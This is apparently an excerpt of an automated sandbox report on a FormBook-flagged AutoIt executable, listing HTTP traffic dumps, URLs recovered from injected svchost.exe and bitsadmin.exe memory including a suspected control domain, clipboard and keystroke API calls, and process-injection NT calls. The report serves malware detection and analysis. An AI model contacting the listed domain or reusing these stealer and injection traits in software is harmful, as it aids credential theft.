Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 98fd3857-fa3d-431b-8c5e-89ea71cd2e6ax-runtime: 0.022298content-length: 17136connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: fdc99e46-44b3-40d7-9a65-2b74ebdac818x-runtime: 0.035044content-length: 17156connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: text/html; charset=UTF-8x-request-id: 0c957264-cb26-4764-89d9-b81bdfdf5465x-runtime: 0.026074content-length: 27236connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 70 78 3b 0a 20 20 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 70 72 65 2d 77 72 61 70 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 70 72 65 2e 62 6f 78 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 45 45 45 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 35 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 65 61 64 65 72 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 46 30 46 30 46 30 3b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 2e 35 65 6d 20 31 2e 35 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 2e 32 65 6d 20 30 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 31 65 6d 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 65 6d 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 32 20 7b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 35 32 46 32 34 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 35 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 64 65 74 61 69 6c 73 20 7b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 34 70 78 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 65 6d 20 30 70 78 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 39 37 38 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20

Source: svchost.exe, 00000001.00000003.2222651208.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2222769442.0000000002C48000.00000004.00000020.00020000.00000000.sdmp, bmHwSvjHTinzr.exe, 00000005.00000003.2332781700.000000000080F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://server/get.asp
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2925122303.0000000000A17000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.8066642.xyz
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2925122303.0000000000A17000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.8066642.xyz/76t8/
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com/css?family=Open
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://help.hover.com/home?source=parked
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: bitsadmin.exe, 00000006.00000002.2924787336.00000000006B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: bitsadmin.exe, 00000006.00000003.2438782166.00000000074F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://twitter.com/hover
Source: bitsadmin.exe, 00000006.00000002.2927707986.000000000751E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/about?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domain_pricing?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/domains/results
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/email?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/privacy?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/renew?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tools?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/tos?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.hover.com/transfer_in?source=parked
Source: bmHwSvjHTinzr.exe, 00000005.00000002.2931991452.0000000006BC6000.00000004.80000000.00040000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2927563301.0000000005C50000.00000004.00000800.00020000.00000000.sdmp, bitsadmin.exe, 00000006.00000002.2925982375.0000000003866000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://www.instagram.com/hover_domains

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B8425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

0_2_00B8425A

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B84458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

0_2_00B84458

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

0_2_00B8425A

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B70219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,

0_2_00B70219

Source: C:\Users\user\Desktop\WyGagXWAfb.exe

Code function: 0_2_00B9CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

0_2_00B9CDAC

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2254547602.00000000031F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2925411607.0000000000880000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925122303.00000000009C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2254014316.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2925743661.0000000002F80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924526490.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2255001512.0000000004400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2924737700.0000000000620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Binary is likely a compiled AutoIt script file

Source: C:\Users\user\Desktop\WyGagXWAfb.exe	Code function: This is a third-party compiled AutoIt script.	0_2_00B13B4C
Source: WyGagXWAfb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.
Source: WyGagXWAfb.exe, 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_85a5d5c6-8
Source: WyGagXWAfb.exe, 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_29acce45-1
Source: WyGagXWAfb.exe	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d319dd2c-6
Source: WyGagXWAfb.exe	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_5eeea35a-5

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0042CB83 NtClose,	1_2_0042CB83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372B60 NtClose,LdrInitializeThunk,	1_2_03372B60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372DF0 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03372DF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_033735C0 NtCreateMutant,LdrInitializeThunk,	1_2_033735C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03374340 NtSetContextThread,	1_2_03374340
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03374650 NtSuspendThread,	1_2_03374650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372BA0 NtEnumerateValueKey,	1_2_03372BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372B80 NtQueryInformationFile,	1_2_03372B80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372BF0 NtAllocateVirtualMemory,	1_2_03372BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372BE0 NtQueryValueKey,	1_2_03372BE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372AB0 NtWaitForSingleObject,	1_2_03372AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372AF0 NtWriteFile,	1_2_03372AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372AD0 NtReadFile,	1_2_03372AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372F30 NtCreateSection,	1_2_03372F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372F60 NtCreateProcessEx,	1_2_03372F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372FB0 NtResumeThread,	1_2_03372FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372FA0 NtQuerySection,	1_2_03372FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372F90 NtProtectVirtualMemory,	1_2_03372F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372FE0 NtCreateFile,	1_2_03372FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03372E30 NtWriteVirtualMemory,	1_2_03372E30
